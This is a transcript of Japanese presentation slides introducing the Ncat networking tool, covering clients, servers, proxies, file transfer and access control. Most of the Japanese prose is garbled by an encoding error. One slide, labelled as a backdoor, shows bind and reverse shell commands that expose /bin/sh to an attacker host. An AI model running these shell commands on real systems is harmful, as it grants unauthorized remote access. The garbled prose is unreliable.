Ncatをつかおう / Use Ncat

Transcript

1. /DBUΛ͔͓ͭ͏ ௕Ԭ
   *5։ൃऀ
   ษڧձ
   ୈճษڧձ /FUDBU

2. ࣗݾ঺հ w )BZBUP
   *NBJ
   
   ࠓҪ൏ਓ
   w !IBZBKP
   w Πϯϑϥ୲౰

3. /FUDBU

4. /FUDBUͱ͸ w ODίϚϯυ
   w ωοτϫʔΫͷεΠεΞʔϛʔφΠϑ
   w ଟ໨తωοτϫʔΫϢʔςΟϦςΟ
   w 5$16%1ϓϩτίϧΛѻ͏
   w

   DBUͷωοτϫʔΫ൛

5. ͍Ζ͍Ζͳ/FUDBU OD ΦϦδφϧ w W  w 6CVOUV (/6൛ w

   ΦϦδφϧޓ׵ w "SDI FYUSB 0QFO#4%൛ w *1Wɺ6%4ରԠ
   w ίϚϯυ࣮ߦඇରԠ w $FOU04
   w 049 /NBQ൛
   ʢ/DBUʣ w 44-ରԠɺଟػೳ w $FOU04 OD!
   
   ODBU CVTZCPY൛ w ΄΅(/6൛ͱಉ͡ w #VTZ#PY
   w "MQJOF ࠓճ͸/NBQ൛/FUDBUͰ͋Δ/DBU ODBU Λ঺հ͠·͢ɻ
   IUUQTONBQPSHODBU

6. /DBU ODBU ͷ͔͍͔ͭͨ

7. ΫϥΠΞϯτ $ ncat -C example.com 80 )551ΫϥΠΞϯτ $ ncat -C

   HOST 11211 .FNDBDIFΫϥΠΞϯτ "4$** $ perl -e 'print "\x80\x00\x00\x05" . "\x00"x4 . "\x00\x00\x00\x05" . "\x00"x12 . "\x68\x65\x6c\x6c\x6f"' |\ > ncat HOST 11211 |\ > hexdump -C .FNDBDIFΫϥΠΞϯτ #*/"3:

8. αʔό  SERVER$ ncat -l --broker HOST1$ ncat SERVER HOST2$

   ncat SERVER $IBUαʔό CSPLFS SERVER$ ncat -l --chat HOST1$ ncat SERVER HOST2$ ncat SERVER $IBUαʔό DIBU $IBUαʔό SERVER$ ncat -l # σϑΥϧτϙʔτ31337 HOST1$ ncat SERVER

9. αʔό  SERVER$ ncat -l 8080 -k \ > --sh-exec

   \ > "echo -e 'HTTP/1.1 200 OK\r\n\r\n';cat index.html" CLIENT$ curl http://SERVER:8080 8FCαʔό SERVER$ ncat --ssl -l 8443 -k \ > --sh-exec \ > "echo -e 'HTTP/1.1 200 OK\r\n\r\n';cat index.html" CLIENT$ curl -k https://SERVER:8443 8FCαʔό 44-

10. ϓϩΩγ  PROXY$ ncat -l 8080 \ > --proxy-type http

    --proxy-auth user:pass CLIENT$ curl -v https://example.com \ > --proxy PROXY:8080 --proxy-user user:pass )551ϓϩΩγ PROXY$ ncat -l 1883 -k \ > --sh-exec 'ncat --ssl -i 3 test.mosquitto.org 8883' CLIENT$ MQTT_HOST=PROXY MQTT_PORT=1883 mqttcli sub -t "#" ϓϩτίϧม׵ )551
    
    )5514 PROXY$ ncat --ssl -l 8443 -k \ > --sh-exec 'ncat -i 3 -C localhost 3000' CLIENT$ curl -k https://PROXY:8443 44-Φϑϩʔυ

11. ϓϩΩγ  PROXY$ mkfifo f PROXY$ ncat -l 8080 -k

    <f | \ > while true; do \ > openssl s_client -connect example.com:443 -quiet >f 2>/dev/null; \ > done ίωΫγϣϯϓʔϦϯά $ httpstat https://example.com/ ... DNS Lookup TCP Connection TLS Handshake Server Processing Content Transfer [ 6ms | 96ms | 371ms | 96ms | 1ms ] | | | | | namelookup:6ms | | | | connect:102ms | | | pretransfer:473ms | | starttransfer:569ms | total:570ms $ httpstat http://PROXY:8080 -H 'Host: example.com' ... DNS Lookup TCP Connection Server Processing Content Transfer [ 5ms | 0ms | 98ms | 0ms ] | | | | namelookup:5ms | | | connect:5ms | | starttransfer:103ms | total:103ms

12. ϑΝΠϧసૹ SERVER$ ncat -l 8080 --recv-only >out.file CLIENT$ ncat --send-only

    SERVER 8080 <in.file ΫϥΠΞϯτ
    
    αʔόసૹ SERVER$ ncat -l 8080 --send-only <in.file CLIENT$ ncat --recv-only SERVER 8080 >out.file αʔό
    
    ΫϥΠΞϯτసૹ SERVER$ ncat --ssl -l 8080 --recv-only >out.file CLIENT$ ncat --ssl --send-only SERVER 8080 <in.file 44-సૹ ΫϥΠΞϯτ
    
    αʔόసૹ

13. TARGET$ ncat -l --exec /bin/sh 8080 ATTACKER$ ncat TARGET 8080

    λʔήοτʹ௚઀ΞΫηεՄೳͳ৔߹ ATTACKER$ ncat -l 8080 TARGET$ ncat --exec /bin/sh ATTACKER 8080 λʔήοτ͕/"5എޙͷ৔߹ όοΫυΞ

14. ΞΫηε੍ޚ $ ncat -l 8080 --allow 10.0.0.2 ڐՄ $ ncat

    -l 8080 --deny 10.0.0.0/8 ڋ൱ ྆ํࢦఆͨ͠৔߹͸
    EFOZ
    ͕༏ઌ͞Ε·͢ɻ

15. ·ͱΊ

16. ·ͱΊ w /FUDBUίϚϯυ͸͍͔ͭ͘ͷ࣮૷͕͋Δ
    w /DBU͸ଟػೳɺ։ൃ΋੝ΜͳͷͰ͓͢͢Ί
    w ΞΠσΞ࣍ୈͰ༷ʑͳ࢖͍ํ͕͋Δ